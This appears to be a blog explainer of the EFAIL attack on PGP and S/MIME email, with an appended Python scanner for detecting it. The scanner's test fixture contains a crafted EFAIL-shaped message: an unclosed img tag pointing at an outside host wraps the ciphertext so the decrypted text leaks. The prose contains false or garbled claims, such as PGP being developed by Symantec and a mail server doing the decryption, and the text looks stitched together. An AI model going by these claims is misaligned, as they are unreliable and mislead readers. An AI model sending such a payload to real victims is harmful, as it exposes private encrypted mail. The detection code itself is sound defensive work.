How EFAIL attacks break down the PGP & S/MIME encryption in mails


As we all know, this era belongs to the technical eavesdroppers. So the basic way to protect yourself from them is secure communication, which is achieved with encryption and decryption methods.

In this piece we are going to see a vulnerability that allows an attacker to read (decrypt) information sent through mail that was protected with a highly regarded and up-to-date encryption technology (no more). Basically, what cryptographic communication does is encrypt your information into ciphertext, which takes you very long to decrypt manually, depending on the type of encryption.

In this scenario PGP & S/MIME encryption does the same, but the attack enables reading of the plain text with the help of the user's own mail client. Before entering into the working of the EFAIL attacks, let's go through some wiki info on PGP & S/MIME encryption.

PGP – Pretty Good Privacy – aka "peel good privacy"

It was developed by the Symantec company and it still rules over every other encryption method. It is used in almost all mail servers and can be switched (enabled or disabled).

S/MIME (Secure/Multipurpose Internet Mail Extensions)

It is an extension or add-on that provides more security in mail servers and is mostly used in corporates to keep classified information within their firms.

Breakdown mechanism of the EFAIL attack:

The main plot here is to turn the encrypted mails into readable plain text. So the attacker first needs to get hold of the encrypted form in order to decrypt it. He will get those mails only if he compromises the victim's mail or captures the encrypted data via network traffic.

When he holds the encrypted data, he will craft a snoop mail to the victim in markup language (HTML), embedding the encrypted data together with a request URL that belongs to the attacker. After this, the client will decrypt the mail and turn it into plain text.

This decrypted data will reach the attacker through the request URL, which refers to an external resource (images or styles). Finally, it gets saved in the attacker's server log.

Understand the process of EFAIL attack:

1. First, the attacker, who owns a server named efail.de and holds the encrypted data, sends a mail to the victim from whom he captured the encrypted form.

2. He embeds the data in HTML code with an external image source in it.

[Image: the crafted HTML img tag (source: Hacker News)]

3. In this case the image tag is not closed on the same line; it extends up to the encrypted form, so that the ciphertext becomes embedded in the HTML code.

4. Finally, he makes his move: he pushes the mail to the victim, and the victim's mail server starts to decrypt it, as shown below.

5. When the victim receives the mail, the external image source gets loaded and the URL is requested. Through this URL the attacker receives the plain text.

Prevention:

  • Experts advise not to use these end-to-end encryptions until the encryption mechanism itself gets updated.
  • Disable the HTML view of mails.
  • To avoid being compromised by attackers, keep strong passwords and enable two-factor authentication.
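One way to check incoming mail for the pattern described in steps 1 to 5 above, and to apply the "disable HTML / remote content" mitigation from the list, as an added example that is not code from the original post or from the EFAIL researchers. It assumes the plain three-part layout the post describes (an HTML part ending in an unterminated tag, the captured ciphertext, then a closing HTML part), looks only at the top-level MIME parts, and uses only Python's standard `email` and `re` modules; the two sample messages and the base64 placeholder ciphertext are constructed for the demo, and the host name efail.de is the one the post uses.

```python
"""Defensive checks for the EFAIL direct-exfiltration pattern.

Added example (not from the original post or the EFAIL researchers).
Assumes the three-part layout the post describes: a text/html part
ending in an unterminated tag, the captured ciphertext, then a closing
text/html part. Sample messages and ciphertext below are constructed.
"""
import email
import re
from email import policy

# src/href/url() values that make a rendering client fetch something remote.
REMOTE_RE = re.compile(
    r"<\s*(?:img|link|iframe|source|video|audio|script)\b[^>]*?"
    r"\b(?:src|href)\s*=\s*['\"]?(https?://[^'\">\s]+)"
    r"|url\(\s*['\"]?(https?://[^'\")\s]+)",
    re.IGNORECASE,
)
# A '<tag ...' that reaches the end of the part without a closing '>'.
UNCLOSED_TAG_RE = re.compile(r"<[A-Za-z][^>]*\Z")


def find_remote_resources(html: str) -> list:
    """Return every http(s) URL that rendering this HTML would request."""
    return [a or b for a, b in REMOTE_RE.findall(html)]


def ends_with_unclosed_tag(html: str) -> bool:
    """True if the HTML stops inside a tag (step 3 of the post)."""
    return UNCLOSED_TAG_RE.search(html.strip()) is not None


def is_encrypted_part(part) -> bool:
    """S/MIME enveloped data, PGP/MIME, or inline ASCII-armoured PGP."""
    ctype = part.get_content_type()
    if ctype in ("application/pkcs7-mime", "application/x-pkcs7-mime",
                 "multipart/encrypted"):
        return True
    return ctype == "text/plain" and "-----BEGIN PGP MESSAGE-----" in part.get_content()


def efail_indicators(raw: bytes) -> dict:
    """Scan one raw message; only the top-level MIME parts are inspected (assumption)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    parts = list(msg.iter_parts()) if msg.is_multipart() else [msg]
    remote, unclosed_before_encrypted = [], False
    for i, part in enumerate(parts):
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        remote.extend(find_remote_resources(html))
        nxt = parts[i + 1] if i + 1 < len(parts) else None
        if nxt is not None and ends_with_unclosed_tag(html) and is_encrypted_part(nxt):
            unclosed_before_encrypted = True
    return {"remote_resources": remote,
            "unclosed_tag_before_encrypted": unclosed_before_encrypted}


def neutralize_remote_resources(html: str) -> str:
    """Rewrite remote URLs so rendering fetches nothing (the 'no HTML /
    no remote content' mitigation), leaving the rest of the markup intact."""
    return REMOTE_RE.sub(
        lambda m: m.group(0).replace(m.group(1) or m.group(2), "about:blank"), html)


# Constructed message shaped like the post's steps 1-5 (the ciphertext is a
# base64 placeholder, not real S/MIME data).
CRAFTED_RAW = b"""\
From: sender@example.net
To: victim@example.com
Subject: constructed EFAIL-shaped sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html

<img src="http://efail.de/
--B1
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--B1
Content-Type: text/html

">
--B1--
"""

# Constructed benign message: closed tags and only a cid: (inline) image.
BENIGN_RAW = b"""\
From: sender@example.net
To: victim@example.com
Subject: constructed benign sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B2"

--B2
Content-Type: text/html

<p>Hello <img src="cid:logo@example"></p>
--B2
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--B2--
"""

if __name__ == "__main__":
    for name, raw in (("crafted", CRAFTED_RAW), ("benign", BENIGN_RAW)):
        print(name, efail_indicators(raw))
```

The scanner flags two independent things: any HTML part that would trigger a remote fetch when rendered (the channel the plaintext leaks through), and the structural signature of an HTML part that stops inside a tag immediately before an encrypted part. A client that applies `neutralize_remote_resources` to every HTML part before rendering, or simply refuses to render HTML at all, closes the channel even when the structural check is evaded.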

Major firms affected by the EFAIL attack:

  • MailDroid
  • Mail App
  • ProtonMail
  • Outlook
  • Gmail
  • Postbox
  • Canary Mail
  • Mailfence
  • KMail
  • Thunderbird
  • Evolution
  • Apple Mail
  • MailMate
  • Airmail
